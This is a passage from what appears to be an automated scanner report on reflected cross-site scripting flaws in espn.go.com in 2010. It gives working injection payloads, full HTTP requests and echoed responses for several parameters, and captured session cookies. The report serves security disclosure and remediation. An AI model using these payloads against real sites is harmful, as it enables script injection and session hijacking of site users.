HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:23:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1371

<html>
<head>
</head>
<body MARGINWIDTH="0" MARGINHEIGHT="0" LEFTMARGIN="0" TOPMARGIN="0" bgcolor="#000000">

<script language="javascript" type="text/javascript" src="http://assets.espn.go.com/ivp/pl
...[SNIP]...
</div>';
   document.write(flashContent); //insert flash content
   var so = new SWFObject("http://sports.espn.go.com/videohub/mpf/player.swf?adminOver=3806325&id=2731137&autostart=true59854";alert(1)//cc78248a523&playerType=SocNet_index", "videoPlayer", "230", "460", "9.0.45", "#000000");
   so.addParam("wmode", "opaque");
   so.addParam("allowScriptAccess", "always");
   so.addParam("base", "http://assets.espn.go.c
...[SNIP]...

5.15. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [player parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /broadband/mpf/players/genericIndexPlayerPage

Issue detail

The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /broadband/mpf/players/genericIndexPlayerPage?id=2731137&player=SocNet_indexfb4ee"%3balert(1)//e664ff0054e&width=230&adminOver=soccernet&height=460&autostart=true HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://soccernet.espn.go.com/?cc=5901
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; AcceptCookies=yes; COREG=5901

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:20:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1399

<html>
<head>
</head>
<body MARGINWIDTH="0" MARGINHEIGHT="0" LEFTMARGIN="0" TOPMARGIN="0" bgcolor="#000000">

<script language="javascript" type="text/javascript" src="http://assets.espn.go.com/ivp/pl
...[SNIP]...
v>';
   document.write(flashContent); //insert flash content
   var so = new SWFObject("http://sports.espn.go.com/videohub/mpf/player.swf?adminOver=3806325&id=2731137&autostart=true&playerType=SocNet_indexfb4ee";alert(1)//e664ff0054e", "videoPlayer", "230", "460", "9.0.45", "#000000");
   so.addParam("wmode", "opaque");
   so.addParam("allowScriptAccess", "always");
   so.addParam("base", "http://assets.espn.go.com/espnvideo/mpf/");
   so
...[SNIP]...

5.16. http://espn.go.com/espn3/index/_/sport/basketball [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/basketball

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75580'%3b056a2319ce8 was submitted in the REST URL parameter 5. This input was echoed as 75580';056a2319ce8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /espn3/index/_/sport/basketball75580'%3b056a2319ce8 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 06:23:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 06:23:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sun, 07 Nov 2010 06:32:10 GMT
Content-Length: 772479
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
<script type="text/javascript">
           anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','basketball75580';056a2319ce8','');
           
           
       </script>
...[SNIP]...

5.17. http://espn.go.com/espn3/index/_/sport/basketball [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/basketball

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 was submitted in the REST URL parameter 5. This input was echoed as 42000"><img src=a onerror=alert(1)>f1469c47fb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /espn3/index/_/sport/basketball42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 06:23:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 06:23:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sun, 07 Nov 2010 06:31:45 GMT
Content-Length: 772619
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
<meta name="description" CONTENT="Enjoy live streaming Basketball42000"><img src=a onerror=alert(1)>f1469c47fb3 online on ESPN3.com. Never miss a game!" />
...[SNIP]...

5.18. http://espn.go.com/sports/scores/window [pageType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /sports/scores/window

Issue detail

The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae11a"%3balert(1)//70dba98dd9 was submitted in the pageType parameter. This input was echoed as ae11a";alert(1)//70dba98dd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sports/scores/window?topId=5564067&pageType=espnfrontpageae11a"%3balert(1)//70dba98dd9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://espn.go.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: espn.go.com
Proxy-Connection: Keep-Alive
Cookie: SWID=53406FAA-0429-45ED-9ACF-3C114582784B; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; SEEN2=cAMLBtEOcAMLD9EO:; CRBLM=CBLM-001:; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; CRBLM_LAST_UPDATE=1289020821

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 07 Nov 2010 03:18:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 03:18:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sun, 07 Nov 2010 03:18:57 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8859

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <title>Live Event Window</title>
   <base href="http://espn.go.com/" />
   <base tar
...[SNIP]...
entById("videoContainer").style.left = "0px";
       }

       function playAd(){
           if(videoReady){
               var adParams = {
                   adUnit:"Pre-Billboard",
                   midSequence:0,
                   siteSection:"espn:mem:espnfrontpageae11a";alert(1)//70dba98dd9",
                   videoID:"espn:mem:espnfrontpageae11a";alert(1)//70dba98dd9"
               };

               com.espn.utils.PlayerCommands.mpfVideoInsertAd(adParams);
           }
       }

       function stopAd(){
           if (!playingHighlight){
               i
...[SNIP]...

5.19. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/config.prodXml

Issue detail

The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videohub/mpf/config.prodXml?player=fpp09&adminOver=380563889c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82&xhr=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289009493; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; SEEN2=JxMLA9EOJxMLA9EO:; TSC=1; espnAffiliate=invalid; ESPN360beta=betaSet; lang=en; DETECT=1.0.0&90557&15933611&1&1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289010396278%7D; fsr.a=1289010420455; s_pers=%20s_c24%3D1289010420966%7C1383618420966%3B%20s_c24_s%3DFirst%2520Visit%7C1289012220966%3B%20s_gpv_pn%3Despn%253Ahome%253Afrontpage%7C1289012220978%3B; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; jt_time=1289010421056

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:38 GMT
Content-Type: text/xml;charset=UTF-8
Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 6403


<mpf>


   <globalPlayerConfig adminOver="380563889c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82">

       <freewheel>
           <debugMode>QUIET</debugMode>
           <networkI
...[SNIP]...

5.20. http://espn.go.com/videohub/mpf/frame/playerEmbed [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the height request parameter is copied into a JavaScript rest-of-line comment. The payload dcdc8%0aalert(1)//e7db8367081 was submitted in the height parameter. This input was echoed as dcdc8
alert(1)//e7db8367081
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9dcdc8%0aalert(1)//e7db8367081&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:19:26 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:19:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 14:27:46 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3092

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame09','width':'432','height':'2431a1a5';alert(1)//f13274ea7b9dcdc8
alert(1)//e7db8367081
','adminOver':'3805638','autoStart':'false'};
</script>
...[SNIP]...

5.21. http://espn.go.com/videohub/mpf/frame/playerEmbed [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:19:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN35
Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2858

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame09','width':'432','height':'f548a';alert(1)//361c204b438','adminOver':'3805638','autoStart':'false'};
</script>
...[SNIP]...

5.22. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload dfe78</script><script>alert(1)</script>983380015ec was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897dfe78</script><script>alert(1)</script>983380015ec&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
